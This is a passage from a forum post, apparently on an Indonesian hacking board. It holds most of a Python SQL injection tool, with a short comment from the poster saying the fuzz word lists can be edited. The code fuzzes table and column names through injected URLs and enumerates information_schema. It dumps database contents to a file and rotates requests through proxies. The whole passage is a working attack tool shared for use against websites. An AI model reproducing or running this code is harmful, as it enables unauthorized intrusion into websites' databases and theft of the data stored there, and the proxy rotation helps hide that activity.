    #print "URL for Counting rows in column:",count_URL
    #print "URL for exploit:",line_URL
    
    #Fuzz table/columns
    if mode == "--fuzz":
            print "[+] Number of tables names to be fuzzed:",len(fuzz_tables)
            file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
            print "[+] Number of column names to be fuzzed:",len(fuzz_columns)
            file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
            print "[+] Searching for tables and columns..."
            file.write("\n[+] Searching for tables and columns...")
            fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
            for table in fuzz_tables: 
                    try:
                            proxy_num+=1
                            table_URL = fuzz_URL.replace("TABLE",table)
                            gets+=1
                            #print "[!] Table Debug:",table_URL
                            source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
                            e = re.findall("darkc0de", source)
                            if len(e) > 0:
                                    print "\n[!] Found a table called:",table
                                    file.write("\n\n[+] Found a table called: "+str(table))
                                    print "\n[+] Now searching for columns inside table \""+table+"\""
                                    file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
                                    for column in fuzz_columns:
                                            try:
                                                    proxy_num+=1
                                                    gets+=1
                                                    #print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
                                                    source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
                                                    e = re.findall("darkc0de",source)
                                                    if len(e) > 0:
                                                            print "[!] Found a column called:",column
                                                            file.write("\n[!] Found a column called:"+column)	
                                            except (KeyboardInterrupt, SystemExit):
                                                    raise
                                            except:
                                                    pass
                                    print "[-] Done searching inside table \""+table+"\" for columns!"
                                    file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
                    except (KeyboardInterrupt, SystemExit):
                            raise
                    except:
                            pass
            
    #Lets Count how many rows or columns
    if mode == "--schema" or mode == "--dump" or mode == "--dbs":
            source = proxy_list[proxy_num % proxy_len].open(count_URL).read() 
            match = re.findall("\x1e\x1e\S+",source)
            match = match[0][2:].split("\x1e")
            row_value = match[0]
            print "[+] Number of "+arg_row+": "+row_value
            file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
    if mode == "--schema" or mode == "--full" or mode == "--dbs":
            print
    ##Schema Enumeration and DataExt loop
    if mode == "--schema" or mode == "--dump" or mode == "--dbs":
    	while int(table_num) != int(row_value)+1:
                    #print "table#:",table_num,"row#:",row_value
    		try:
    			proxy_num+=1
    			gets+=1
    			#print line_URL
    			source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read() 
    			match = re.findall("\x1e\x1e\S+",source)
    			if len(match) >= 1:
    				if mode == "--schema" or mode == "--full":
    					match = match[0][2:].split("\x1e")
    					if cur_db != match[0]:			
    						cur_db = match[0]
    						file.write("\n[Database]: "+match[0]+"\n")
    						print "[Database]: "+match[0]
    						print "[Table: Columns]"
    						file.write("[Table: Columns]")
    					if cur_table != match[1]:
                                                    print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
                                                    file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
    						cur_table = match[1]
                                    		table_num = int(table_num) + 1
    					else:
                                                    sys.stdout.write(",%s" % (match[2]))
                                                    file.write(","+match[2])
                                                    sys.stdout.flush()
    				#Gathering Databases only
                       		elif mode == "--dbs":
                            		match = match[0]
                            		file.write("\n["+str(num)+"]"+str(match))
                           			print "["+str(num)+"]",match
    					table_num = int(table_num) + 1
    				#Collect data from tables & columns
    				elif mode == "--dump":
                                            match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
    					match = match[0].strip("\x1e").split("\x1e")
    					if arg_verbose == 1:
                                                    print "\n["+str(num)+"] ",
                                                    file.write("\n["+str(num)+"] ",)
                                            else:
                                                    print 
                                                    file.write("\n")
    					for ddata in match:
                                                    if ddata == "":
                                                            ddata = "NoDataInColumn"
                                                    sys.stdout.write("%s:" % (ddata))
                                                    file.write("%s:" % ddata)
                                                    sys.stdout.flush()
                                            table_num = int(table_num) + 1
    			else:
    				if mode == "--dump":
                                            sys.stdout.write("\n[%s] No data" % (num))
                                            file.write("%s:" % ddata)
                                            table_num = int(table_num) + 1
                                    else:
                                            break
    			num = int(num) + 1
    		except (KeyboardInterrupt, SystemExit):
    			raise
    		except:
    			pass
    
    #Full SQLi information_schema Enumeration
    if mode == "--full":
            while 1:
                    try:                        
                            proxy_num+=1
                            gets+=1
                            source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read() 
                            match = re.findall("\x1e\x1e\S+",source)
                            if len(match) >= 1:
                                    match = match[0][2:].split("\x1e")
                                    if cur_db != match[0]:			
                                            cur_db = match[0]
                                            file.write("\n\n[Database]: "+match[0]+"\n")
                                            print "\n\n[Database]: "+match[0]
                                            print "[Table: Columns]"
                                            file.write("[Table: Columns]")
                                            table_num=0
                                    if cur_table != match[1]:
                                            print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
                                            file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
                                            cur_table = match[1]
                                            table_num = int(table_num) + 1
                                    else:
                                            sys.stdout.write(",%s" % (match[2]))
                                            file.write(","+match[2])
                                            sys.stdout.flush()
                            else:
                                    if num == 0:
                                            print "\n[-] No Data Found"
                                    break
                            num = int(num) + 1
                    except (KeyboardInterrupt, SystemExit):
                            raise
                    except:
                            pass
    
    #Lets wrap it up!
    if mode == "--schema" or mode == "--full" or mode == "--dump":
            print ""
    print "\n[-] %s" % time.strftime("%X")
    print "[-] Total URL Requests",gets
    file.write("\n\n[-] [%s]" % time.strftime("%X"))
    file.write("\n[-] Total URL Requests "+str(gets))
    print "[-] Done\n"
    file.write("\n[-] Done\n")
    print "Don't forget to check", dbt,"\n"
    file.close()


    dict fuzz table ama column table wat fuzz technique bs edit ndri ya klo mau tambahin..defaultny sgtu aj..
    ini code python..silahkan install dlu interpreternya..
    Last edited by bl00d13z; 14-05-09 at 16:02.

Page 2 of 3 FirstFirst 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •